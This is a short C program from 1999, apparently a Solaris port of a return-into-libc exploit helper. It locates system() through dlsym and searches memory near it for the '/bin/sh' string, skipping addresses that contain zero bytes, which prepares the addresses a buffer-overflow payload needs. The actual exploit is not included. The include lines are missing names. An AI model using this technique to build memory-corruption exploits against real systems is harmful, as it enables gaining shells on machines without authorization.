/* * demonstration of program that finds where is "/bin/sh" string in its * mapping, using SD's linux exploits for `return into libc' method and * Solaris Designer's same exploits.. * * kreator * Sun Nov 7 15:51:35 CET 1999 * */ #include #include #include #include #include int step; /* direction, left/right */ jmp_buf env; /* stack environment */ void segfault() { if (step<0) /* we were heading backwards */ longjmp(env, 1); /* restore stack environment */ else { /* oops! we have already changed direction :-( */ fprintf(stderr, "Cannot find \"/bin/sh\" in libc mapping.\n"); exit(EXIT_FAILURE); } } int main(int argc, char **argv) { void *handle; long systemaddr, shell; int (*system)(const char *); /* dlopen() myself */ if (!(handle=dlopen(NULL, RTLD_LAZY))) { fprintf(stderr, "Cannot dlopen() myself.\n"); exit(EXIT_FAILURE); } /* find address of system() */ if ((systemaddr=system=dlsym(handle, "system"))==NULL) { fprintf(stderr, "Cannot find system() using dlsym().\n"); exit(EXIT_FAILURE); } systemaddr-=8; /* This is changed to -8 because the ret would add 8 to the saved %fp */ if (!(systemaddr & 0xff) || !(systemaddr & 0xff00) || !(systemaddr & 0xff0000) || !(systemaddr & 0xff000000)) { fprintf(stderr, "Address of system() contains a '0'." "Sorry.\n"); exit(EXIT_FAILURE); } /* test system() */ (*system)("echo yup, this works.."); fprintf(stderr, "Function system() found at %lx\n", systemaddr); /* if longjmp() returns non-zero revert search direction */ if (setjmp(env)) step=1; else step=-1; /* we will search around system() */ shell=systemaddr; /* remap segmentation fault signal */ signal(SIGSEGV, segfault); /* search for "/bin/sh" until SEGV */ do while (memcmp((void *)shell, "/bin/sh", 8)) shell+=step; while (!(shell & 0xff) || !(shell & 0xff00) || !(shell & 0xff0000) || !(shell & 0xff000000)); fprintf(stderr, "String \"%s\" found at %lx\n", shell, shell); /* exploit follows :-) */ return(EXIT_SUCCESS); }